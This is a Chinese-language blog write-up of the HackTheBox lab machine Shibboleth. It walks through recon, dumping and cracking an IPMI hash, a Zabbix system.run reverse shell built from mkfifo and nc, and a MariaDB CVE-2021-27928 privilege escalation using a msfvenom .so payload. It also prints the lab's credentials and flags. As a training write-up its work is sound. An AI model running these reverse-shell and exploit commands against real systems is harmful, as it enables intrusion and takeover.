废物的靶场日记 hackthebox-Shibboleth
今天做个medium难度的 以惩戒中午嗯造炸鸡奶茶的罪行!
明天继续开混easy 摆烂还是要摆烂的
靶场是Shibboleth 靶机IP 10.10.11.124
前渗透
老样子 信息收集 nmap -sV -A 10.10.11.124 只有一个80端口
访问发现得先绑一下hosts vi /etc/hosts 10.10.11.124 shibboleth.htb
但是访问发现这个网页好像是不完整的 而且没什么入口 于是dirsearch wfuzz两头开花扫扫
wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u shibboleth.htb -H “Host:FUZZ.shibboleth.htb” --hw 26 开扫子域名
000000099: 200 29 L 219 W 3684 Ch “monitor”
000000346: 200 29 L 219 W 3684 Ch “monitoring”
000000390: 200 29 L 219 W 3684 Ch “zabbix”
出来三个子域名 dirsearch没啥东西 结果访问这三个子域名都是一样的后台登录地址 登录是post方式 懒狗必然是直接sqlmap -r a.txt跑一跑
跑了半天啥也没有 于是找了几个可能的词生成字典想试试爆破
但是这新装的kali上自带的burp限制爆破速度 仔细想想也不太可能是爆破
遂直接放弃 回头得更新一下工具
做到现在进度已经很明显了 基本上是啥都没做出来 麻了 但没有完全麻 局麻
回顾一下 比较有可能的就是有我没扫出来的端口了 一开始我以为是扫全端口结果还是没扫出来最后发现是扫UDP端口
sudo nmap -sU --min-rate 1000 10.10.11.124
623/udp open asf-rmcp
1068/udp closed instl_bootc
看到这么两个端口 好消息是这个623端口开着多半有花头 坏消息是它寄吧谁
直接msf里search一哈 search不到 那么就来到了我们的google英语阅读环节
发现623归属的IPMI 在2.0版本是有漏洞的 msf里search了一下有
auxiliary/scanner/ipmi/ipmi_version
跑一下 果然是2.0 这入口你挺能藏啊
之后 auxiliary(scanner/ipmi/ipmi_dumphashes) 得到
[+] 10.10.11.124:623 - IPMI - Hash found:
Administrator:d21f58d6820100008e58c3351e556662ebf840d60f5874aec9120704e3f2f7e5e072a33126ce69f4a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:b55e3f63c7833751b2f450eca7da8a29de783e9a
然后就是hashcat跑了 这里hash modes是7300
7300 | IPMI2 RAKP HMAC-SHA1 | Network Protocols
hashcat -m 7300 d21f58d6820100008e58c3351e556662ebf840d60f5874aec9120704e3f2f7e5e072a33126ce
69f4a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:b55e3f63c7833751b2f450e
ca7da8a29de783e9a -a 0 rockyou.txt 开冲!
果不其然又到了每日一寄环节 新kali只设置了2g内存 冲不动 关掉kali重新设置8G内存再重新启动重连上来
得到密码 ilovepumkinpie1 南瓜饼确实能处!
登陆后台 没找到文件上传之类的东西 但是5.0.17版本的zabbix直接有exp https://packetstormsecurity.com/files/166256/Zabbix-5.0.17-Remote-Code-Execution.html
看了exp复现发现这是个锤子exp 后台原来直接就有官方rce
http://monitor.shibboleth.htb/items.php?form=create&hostid=10084
key选项可以直接select system.run 那就经典nc -lvnp 7888
system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 7888 >/tmp/f,nowait]
弹回shell 前渗透结束
后渗透
进去了但是发现连cat user.txt都不够权限 纯废物权限啥都干不了
/etc/passwd 发现只有个ipmi-svc❌1000:1000:ipmi-svc,:/home/ipmi-svc:/bin/bash
密码就是后台密码 拿下user的flag f088a31c961388f860d617119d7b47b8
继续提权 看了一下端口有3306 mysql -V
mysql Ver 15.1 Distrib 10.3.25-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
searchsploit小手一搜 版本不够 google小手一搜 CVE-2021-27928
可以在修改wsrep_provider和wsrep_notify_cmd后提权执行命令
不过这个cve提权需要mysql的密码 /etc/下面的.conf里有
zabbix bloooarskybluh
然后就是毫无含金量的cve模仿秀!
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.11 LPORT=4444 -f elf-so -o a.so
nc -lvp 4444
mysql -u zabbix -p -e ‘SET GLOBAL wsrep_provider="/tmp/a.so";’
4444的nc弹回来拿到root权限 找到另外一个root的flag c71237b166b874d49ade0926b21e6b6d 打完
打完之后rank也光荣的从noob进化成了Script Kiddie 可以说是对我这个废物完美的总结了
扫一扫
4235
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
